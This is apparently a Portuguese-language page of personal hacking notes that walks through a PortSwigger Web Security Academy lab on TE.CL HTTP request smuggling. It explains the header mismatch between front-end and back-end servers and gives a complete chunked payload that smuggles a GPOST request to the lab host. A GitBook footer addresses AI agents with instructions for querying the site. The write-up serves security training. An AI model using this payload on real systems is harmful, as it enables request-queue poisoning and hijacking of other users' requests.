> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/web/request-smuggling/basic-te-cl-request-smuggling.md).

# Vulnerabilidade de HTTP Request Smuggling TE.CL

### HTTP Request Smuggling, Vulnerabilidade Básica TE.CL

Neste cenário, a aplicação usa um servidor frontal e um servidor interno. O **servidor back-end não suporta codificação em chunked**, enquanto o **servidor front-end aceita apenas GET e POST** métodos. Essa diferença de comportamento nos permite explorar uma vulnerabilidade do tipo **TE.CL**, em que o servidor frontal interpreta a requisição de acordo com o cabeçalho Transfer-Encoding, enquanto o servidor interno se baseia em Content-Length.

#### **Objetivo do laboratório**

Injete uma requisição no fluxo HTTP para que a próxima **requisição processada pelo servidor back-end pareça usar o `GPOST`** método, o que valida o laboratório.

#### **Notas Importantes**

* Embora o laboratório suporte HTTP/2, a técnica esperada é baseada exclusivamente em mecanismos específicos de **HTTP/1**. Portanto, o protocolo deve ser modificado manualmente no Burp Repeater, se necessário.
* Campos de comprimento podem ser difíceis de lidar corretamente. A **HTTP Request Smuggler** extensão disponível na BApp Store facilita essa tarefa.

#### **Exemplo de Payload Explorando TE.CL**

Neste ataque, o servidor frontal interpreta a mensagem em modo chunked, enquanto o servidor back-end calcula o fim da requisição via Content-Length, permitindo inserir uma segunda requisição:

```http
POST / HTTP/1.1
Host: 0acf00f80484e31881442f77004300cd.web-security-academy.net
Connection: keep-alive
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
Content-Length: 4

72
GPOST / HTTP/1.1
Host: 0acf00f80484e31881442f77004300cd.web-security-academy.net
Content-Length: 20

test=test
0


```

<figure><img src="/files/58aee4094af8f7f18b156fb859b2570c38edda11" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/web/request-smuggling/basic-te-cl-request-smuggling.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
